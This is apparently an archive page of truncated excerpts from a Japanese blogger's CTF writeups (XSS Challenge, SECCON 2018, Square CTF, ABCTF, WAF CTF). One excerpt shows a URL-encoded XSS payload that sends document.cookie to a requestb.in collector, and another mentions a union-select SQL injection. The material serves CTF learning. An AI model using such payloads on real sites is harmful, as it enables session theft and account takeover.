参加してました。 containers foremostして出てきたpngの文字列を合わせるだけだった 最初と最後の文字列は切れてたけどどうせcと}だろうと思ってそのまま投げたら通ったので良かった [warmup] Ramen SQL injection。 union selectでinformation_schemaからt…

前回の流れで こちらをやっていました。 現状出ている34問分が終わったのと、writeupが公開可なようだったのでついでに上げてみました。 25までの解答が消えてしまいこれを書くにあたって解き直していたので、cookieの送信先が変わってるのはそのせいです。 …

暇なのでこちらをやってました XSS Challenge (by y0n3uchy) 解法を公開しても良いとのことだったので、稚拙ですがwriteupを書きました。 現状出ている問題のみですが、追加され次第更新したいなと思います。 gist.github.com

いくつか参加して簡単な問題だけ解いてました。 Square CTF ratingがスゴかった… dot-n-dash ﾒﾁｬｸﾁｬ雑にデコード処理を書いた function _decode(input) { let q = input.split(".").map(a=>a.length) let b = Array(Math.max.apply(null, q)).fill("0"); q.m…

色々あって色々アレでした。 一度も更新しないまま2018年も終わりかけているのでとりあえず… SECCON 2018 Online CTF 参加してました チームで参加したため、自分として解けた問題がとても少ないですが 以下writeupです。 Runme こういう、stringsではflagは…

楽しかったです 全部解けるようがんばります…がんばりたい… 2 やるだけ q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E 3 やるだけ q=%22%3E%3Cscript%3Elocation.href=%22https://reques…

gist.github.com

大分間が空きましたが元気です。がんばります 色々あって引きこもってました。 現在もわりと引きこもってます。色々あって今にいたります 年末に風邪をこじらせている間にいつの間にか年も越して 気がつけば２月… 最近はCTFなどはにわかに参加しているくらい…

ABCTFの簡単なのをﾀﾞﾗﾀﾞﾗやっていて、あとは土日でやろう… と楽しみに思っていたのですが、いつの間にか終わっていたので、 少し凹んだ。 Writeupがわりと寂しくなっていてショボイですが、覚え書き。 Caesar Salad - Crypt 10 xyzqc{t3_qelrdeq_t3_k33a3a_l…

和風(WAF〜)CTFというとてもナイスなデザインのCTFであった 全体的に初心者向けであったので、ﾒﾁｬﾝｺ初心者な自分にも楽しめた 稚拙ながら、とりあえず解けた問題のwriteupというか感想というか なものを書いてみました。 101 image level 1 つなげるだけ 111…

スゴイ内輪でやってるCTF的なやつの答え合わせ的なやつ 自分が作ったのを自分でWriteup書くという自作自演感。 初心者以下の自分が初めての人用にと作ったのでしょうもない上にあまり面白くもないと思うので、身内用に。 1. ba_ev.zip zipの中に auth.pcap p…